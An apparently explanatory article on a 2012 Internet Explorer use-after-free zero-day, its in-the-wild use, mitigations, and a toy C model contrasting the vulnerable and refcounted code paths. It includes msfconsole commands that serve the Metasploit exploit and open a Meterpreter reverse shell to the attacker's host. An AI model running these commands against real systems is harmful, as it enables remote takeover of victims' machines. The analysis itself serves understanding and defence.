Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer browser is being actively attacked in the wild. Four active exploits of the zero-day vulnerability in the browser exist. Microsoft will push out an out-of-cycle Windows patch for the critical Internet Explorer flaw.
Security researcher Eric Romang identified the exploit code on a server used by the "Nitro" hacking group, which is believed to have exploited the Java zero-day vulnerability reported last month. Security firm Rapid7 advises that Internet users switch to a different Web browser for now. The malware may be linked to an ongoing campaign against companies that has been dubbed "Nitro", which Symantec first documented in October.
The zero-day affects IE 6 through 9 and is a use-after-free memory corruption vulnerability. Unlike a buffer overflow it does not write past the end of a buffer; instead, memory belonging to an object that has already been freed is handed to a new allocation and then used again through the old pointer, which an attacker can likewise turn into remote code execution on the victim's machine. The original exploit dropped the PoisonIvy remote access Trojan (RAT), with a malicious Flash movie file used as part of the exploit page. The latest payload discovered drops the PlugX RAT via the same Flash file.
This type of attack typically begins with a phishing email, or by tricking users into clicking links on social media. The security advisory notes that mainstream websites carrying ads served by third-party ad servers could also deliver the exploit if those ad servers are compromised. In other words, any site could be used to take advantage of the IE flaw. It is a serious flaw.
Even the German government has started telling its citizens to switch to other browsers. Microsoft has reported that most users are not affected by the bug and that the number of attacks has been limited. In the company's update about the bug, it suggests either deactivating ActiveX controls or using its Enhanced Mitigation Experience Toolkit (EMET) until a patch is released.
Metasploit has also released an exploit module for it. The module description reads: "This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it."
Usage (in msfconsole; SRVHOST and LHOST are the attacker's own address, and the last two commands run inside the Meterpreter session that opens once a victim browses to the served URL):
use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit
sysinfo
getuid
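The use-after-free mechanism described in the paragraphs above (an object deleted while a caller still holds a pointer to it, the freed memory reused by a later same-size allocation, and then a virtual call through the stale pointer in Exec()) reduced to a minimal C model. This is an added example and not code from the page, the Metasploit module, or Microsoft: the toy slab allocator, the MshtmlEd struct, the vtable layout and all function names are invented for illustration. The hardened variant uses reference counting to keep the object alive across the script callout, which is one standard fix pattern for this class of bug and not a description of Microsoft's actual patch.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Toy heap for the example: fixed-size slots handed out from a LIFO free
 * list, so the slot freed most recently is the one the next allocation
 * receives. This models the allocator behaviour a use-after-free exploit
 * relies on; it is not IE's heap.
 */
#define SLOT_SIZE 32
#define NSLOTS    8

static union { uint8_t bytes[NSLOTS * SLOT_SIZE]; void *align; } heap_mem;
static int free_stack[NSLOTS];
static int free_top;

static void heap_init(void)
{
    free_top = 0;
    for (int i = NSLOTS - 1; i >= 0; i--)
        free_stack[free_top++] = i;          /* slot 0 ends up on top */
}

static void *heap_alloc(void)
{
    if (free_top == 0)
        return NULL;
    return heap_mem.bytes + (size_t)free_stack[--free_top] * SLOT_SIZE;
}

static void heap_free(void *p)
{
    int idx = (int)(((uint8_t *)p - heap_mem.bytes) / SLOT_SIZE);
    free_stack[free_top++] = idx;            /* straight back on top of the list */
}

/* Stand-in for the editing object: vtable pointer first, as in a C++ object. */
typedef struct MshtmlEd MshtmlEd;
typedef int (*exec_fn)(MshtmlEd *self, int cmd);
struct MshtmlEd {
    const exec_fn *vtable;
    int            refs;
};

static int legit_exec(MshtmlEd *self, int cmd) { (void)self; return cmd; }
static const exec_fn legit_vtable[] = { legit_exec };

/* Stands in for attacker-controlled code; a real exploit lands in shellcode here. */
#define PWNED 0x41414141
static int attacker_exec(MshtmlEd *self, int cmd) { (void)self; (void)cmd; return PWNED; }
static const exec_fn attacker_vtable[] = { attacker_exec };

/*
 * Vulnerable flow: the caller keeps a raw pointer to the editor, hands control
 * to script, script destroys the editor and allocates a same-size object that
 * lands in the freed slot, and the caller then calls Exec() through the stale
 * pointer. The "vtable" it dereferences is now attacker data.
 */
int vulnerable_exec(int cmd)
{
    heap_init();
    MshtmlEd *ed = heap_alloc();
    ed->vtable = legit_vtable;
    ed->refs = 1;

    /* --- script callout --- */
    heap_free(ed);                           /* editor torn down unexpectedly */
    MshtmlEd *fake = heap_alloc();           /* attacker's allocation: same slot as ed */
    fake->vtable = attacker_vtable;          /* fake vtable pointer written into reused memory */
    /* --- script returns --- */

    return ed->vtable[0](ed, cmd);           /* Exec() dispatches through the attacker's vtable */
}

static void ed_addref(MshtmlEd *ed)  { ed->refs++; }
static void ed_release(MshtmlEd *ed) { if (--ed->refs == 0) heap_free(ed); }

/*
 * Hardened flow: the caller takes its own reference before the callout, so the
 * script's release only drops the count and the object is not freed until
 * Exec() has returned. The attacker's allocation gets a different slot.
 */
int hardened_exec(int cmd)
{
    heap_init();
    MshtmlEd *ed = heap_alloc();
    ed->vtable = legit_vtable;
    ed->refs = 1;

    ed_addref(ed);                           /* hold the object across the callout */
    /* --- script callout --- */
    ed_release(ed);                          /* script's "destroy": 2 -> 1, nothing freed */
    MshtmlEd *fake = heap_alloc();           /* lands in a fresh slot, not ed's */
    fake->vtable = attacker_vtable;
    /* --- script returns --- */

    int result = ed->vtable[0](ed, cmd);     /* still the legitimate vtable */
    ed_release(ed);                          /* 1 -> 0, freed only now */
    heap_free(fake);
    return result;
}

int main(void)
{
    printf("vulnerable: Exec(7) returned 0x%x\n", (unsigned)vulnerable_exec(7));
    printf("hardened:   Exec(7) returned 0x%x\n", (unsigned)hardened_exec(7));
    return 0;
}
```

Build with `cc -Wall uaf_model.c -o uaf_model && ./uaf_model`. The vulnerable path returns the attacker's marker value because the stale pointer's first field was overwritten by the allocation that reused its slot; the refcounted path returns the command value unchanged. The same shape is what the Flash heap spray in the real exploit sets up: it fills freed memory with data the attacker chooses so the dangling vtable dereference lands on controlled bytes.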